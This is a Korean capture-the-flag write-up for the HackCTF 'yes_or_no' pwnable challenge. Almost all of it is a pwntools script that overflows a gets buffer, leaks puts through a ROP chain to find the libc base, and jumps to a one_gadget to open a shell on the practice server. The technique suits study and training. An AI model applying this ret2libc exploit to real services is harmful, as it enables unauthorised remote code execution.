gdb로 확인해보면
값을 넣고 gets 를 이용해 rop 를 진행하면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3009)
e = ELF('./yes_or_no', checksec=False)
libc = ELF('./libc-2.27.so', checksec=False)
r.sendline('9830400')
r.recvuntil('me\n')
payload = 'A'*26
payload += p64(0x0400883)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.sym['main'])
r.sendline(payload)
leak = u64(r.recv(6)+ '\x00\x00')
libc_base = leak - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh\x00').next()
oneshot = libc_base + 0x10a38c
r.sendlineafter('~!\n', '9830400')
payload = 'A'*26
payload += p64(oneshot)
r.sendline(payload)
r.interactive()
'HackCTF > pwnable' 카테고리의 다른 글
| HackCTF - BOF_PIE (0) | 2021.11.21 |
|---|---|
| HackCTF - Offset (0) | 2021.11.21 |
| HackCTF - Simple_Overflow_ver_2 (0) | 2021.11.21 |
| HackCTF - x64 Simple_size_BOF (0) | 2021.11.21 |
| HackCTF - x64 Buffer Overflow (0) | 2021.11.21 |
